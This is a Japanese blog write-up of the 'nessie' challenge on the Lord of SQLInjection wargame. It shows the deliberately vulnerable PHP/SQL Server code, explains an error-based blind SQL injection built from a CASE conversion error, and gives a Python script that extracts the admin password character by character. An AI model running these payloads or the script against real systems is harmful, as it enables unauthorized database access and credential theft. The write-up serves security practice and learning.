はまやんはまやんはまやん

hamayanhamayan's blog

nessie [LORD OF SQLINJECTION]

Security

競プロのコード例について補足 競技プログラミング練習問題集 Twitter 競技セキュリティまとめのまとめ

Lord of SQLInjection

<?php
include "./config.php";
login_chk();
$db = mssql_connect();
if(preg_match('/master|sys|information|prob|;|waitfor|_/i', $_GET['id'])) exit("No Hack ~_~");
if(preg_match('/master|sys|information|prob|;|waitfor|_/i', $_GET['pw'])) exit("No Hack ~_~");
$query = "select id from prob_nessie where id='{$_GET['id']}' and pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
sqlsrv_query($db,$query);
if(sqlsrv_errors()) exit(mssql_error(sqlsrv_errors()));

$query = "select pw from prob_nessie where id='admin'"; 
$result = sqlsrv_fetch_array(sqlsrv_query($db,$query));
if($result['pw'] === $_GET['pw']) solve("nessie"); 
highlight_file(__FILE__);

特徴は以下。

  • SQL Server
  • id,pwが入力可能
    • master,sys,information,prob,;,waitforがフィルタリング
  • エラーが出れば表示される
  • adminのpwを取得してくる必要がある

Error-based Blind SQL Injectionしよう

Error-based Blind SQL Injection

SQL Serverでエラーを出したいとき

  • Error: [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Conversion failed when converting the varchar value 'z' to data type int.
    • [LOS] nessie
    • 1=(case when 条件 then 'z' end)とすれば条件がtrueならエラーが出る

なるほど?以下のように式を作ろう。

以下で長さを抜き取る。
admin' and 1=(case when {md} <= len(pw) then 'z' end) --
以下で中身を抜き取る。
admin' and 1=(case when {md} <= ascii(substring(pw,{i+1},1)) then 'z' end) --

import requests

url = "https://los.rubiya.kr/chall/nessie_7cd2.php"
cookie = {'PHPSESSID': ''}

def check(data) -> bool:
    return "Error: [Microsoft][ODBC Driver 17 for SQL Server]" in data
    return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data)

ok = 0
ng = 120

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = f"admin' and 1=(case when {md} <= len(pw) then 'z' end) --"
    res = requests.get(url, params={'id': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 256

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = f"admin' and 1=(case when {md} <= ascii(substring(pw,{i+1},1)) then 'z' end) --"
        res = requests.get(url, params={'id': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")